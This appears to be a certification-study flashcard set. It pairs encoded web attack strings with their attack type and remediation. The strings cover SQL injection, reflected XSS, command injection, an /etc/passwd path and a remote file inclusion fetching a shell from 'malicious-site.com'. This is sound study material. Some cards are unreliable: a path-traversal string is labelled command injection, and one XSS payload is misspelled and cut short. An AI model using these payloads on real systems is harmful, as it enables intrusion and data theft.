3.4 Given a scenario, exploit application-based vulnerabilities Flashcards
What type of attack:
item-widget’;waitfor%20delay%20’00:00:20’;–
SQL Injection (Stacked)
- item-widget’;waitfor%20delay%20’00:00:20’;–
- Parameterized Queries
Remediation
item-widget’;waitfor%20delay%20’00:00:20’;–
Parameterized Queries
- item-widget’;waitfor%20delay%20’00:00:20’;–
What type of attack:
inner-tab’>alert (1)
Reflected Cross-Site Scripting (XSS)
What is the remediation of the following?
inner-tab’>alert (1)
Input Sanitization < >
“,’,
- inner-tab’>alert (1)
What type of attack:
search=Bob”%3e%3cimg%20src%3da%20oneerror%3dalert(1)%3
Reflected Cross-Site Scripting
Remediation:
search=Bob”%3e%3cimg%20src%3da%20oneerror%3dalert(1)%3
Input Sanitization < >
“,’,
What type of attack:
item=widget’ + convert(int,@@version) +’
SQL Injection (Error-based)
- item=widget’ + convert(int,@@version) +’
- Error comes from converting the (int)
Remediation:
item=widget’ + convert(int,@@version) +’
Parameterized Queries
- SQL is always Parameterized Queries
What type of attack:
logfile=%2fetc%2fpasswd%00
Command Injection
- logfile=%2fetc%2fpasswd%00
- Could not find definite answer why
Remediation:
logfile=%2fetc%2fpasswd%00
Input Sanitization $ (.) (.)
- The attack is: Command Injection
What type of attack:
site=www.exa’ping%20-c%2010%201ocalhost’mple.com
Command Injection
- site=www.exa’ping%20-c%2010%201ocalhost’mple.com
- Ping is the giveaway
- Input Sanitization …, \ , / , sandbox requests
What type of attack:
item=widget%20union%20select%20null ,null ,@@version;–
SQL Injection (Union)
- item=widget%20union%20select%20null ,null ,@@version;–
- UNION is dead giveaway
- SQL is always Parameterized Queries
What type of attack:
logfile=http:%2f%2fwww.malicious-site.com%2fshell.txt
Remote File Inclusion
- logfile=http:%2f%2fwww.malicious-site.com%2fshell.txt
- Input Sanitization … , \ , / , Sandbox Requests
What type of attack is this?
lookup=$(whoami)
Command Injection
- lookup=$(whoami)
What is the remediation of the following:
logfile=http:%2f%2fwww.malicious-site.com%2fshell.txt
Input Sanitization … , \ , / , Sandbox Requests